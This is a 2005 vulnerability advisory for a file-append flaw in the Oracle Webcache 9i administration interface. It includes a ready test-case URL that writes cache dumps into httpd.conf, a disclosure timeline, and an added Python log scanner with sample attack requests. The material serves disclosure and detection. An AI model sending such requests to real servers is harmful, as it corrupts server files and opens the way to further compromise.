Append file in Oracle Webcache 9i

Name: Append file in Oracle Webcache 9i
Systems Affected: Oracle Application Server with Webcache 9i
Severity: Medium Risk
Category: Corruption of files
Vendor URL: http://www.oracle.com/
Author: Alexander Kornbrust (ak at red-database-security.com)
Date: 11 May 2005 (V 1.02)
CAN-Number: CAN-2005-1382


Details
It is possible to corrupt any file of an Oracle Application Server installation by appending garbage to the file (e.g. httpd.conf).
This issue can be combined with cross site scripting vulnerabilities in the webcache administrator application.

Patch Information
Oracle fixed this issue with informing me or their customers.

Testcase
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&
index=1&cache_dump_file=/opt/ORACLE/ias/9.0.2/Apache/Apache/conf/httpd.conf
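
A detection sketch for the request shape in the test case above, added here as an example and not part of the original advisory: it scans access log lines for webcacheadmin CacheDump requests whose cache_dump_file points outside an expected dump directory. The log format, the allowed directory, the function names and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the only directory where cache dumps are legitimately written.
ALLOWED_DUMP_DIR = "/var/tmp/webcache_dumps"
# Assumption: Common Log Format, request field like "GET /path?query HTTP/1.1".
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_dump_target(log_line, allowed_dir=ALLOWED_DUMP_DIR):
    """Return the dump path if the line is a CacheDump request that writes
    outside allowed_dir, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/webcacheadmin"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if "CGA.CacheDump" not in params.get("SCREEN_ID", []):
        return None
    for raw in params.get("cache_dump_file", []):
        target = posixpath.normpath(raw)  # collapse "." and ".." segments
        if target != allowed_dir and not target.startswith(allowed_dir + "/"):
            return target
    return None

def scan(lines):
    """Return (line_number, target_path) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        target = suspicious_dump_target(line)
        if target is not None:
            hits.append((number, target))
    return hits

# Constructed sample log lines for illustration, not from a real system.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Apr/2005:10:00:01 +0200] "GET /webcacheadmin?SCREEN_ID=CGA.CacheDump'
    '&ACTION=Submit&index=1&cache_dump_file=/var/tmp/webcache_dumps/dump1.txt HTTP/1.1" 200 512',
    '10.0.0.9 - - [26/Apr/2005:10:02:13 +0200] "GET /webcacheadmin?SCREEN_ID=CGA.CacheDump'
    '&ACTION=Submit&index=1&cache_dump_file=%2Fopt%2FORACLE%2Fias%2F9.0.2%2FApache%2FApache'
    '%2Fconf%2Fhttpd.conf HTTP/1.1" 200 498',
    '10.0.0.5 - - [26/Apr/2005:10:03:40 +0200] "GET /webcacheadmin?SCREEN_ID=EXAMPLE.Other HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, target in scan(SAMPLE_LOG):
        print(f"line {number}: cache dump written to {target}")
```

Because the query string is percent-decoded and the path normalised before the comparison, an encoded or indirect path is matched on its real target.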


History
23-sep-2003 Oracle secalert was informed
23-sep-2003 Bug confirmed
26-apr-2005 Red-Database-Security published this advisory
11-may-2005 CAN added




2005 by Red-Database-Security GmbH - last update 03-nov-2005

Oracle Webcache


Oracle Webcache is part of the Oracle Application Server, aka OAS, aka IAS.

The Oracle Web Cache can be used to cache static and dynamically generated web pages. The cache should be your first point for accepting user requests from clients using web browsers.

The Web Cache also provides load balancing and can route non-cached requests to a set of web servers. This provides protection when some of the servers are overloaded or become inaccessible.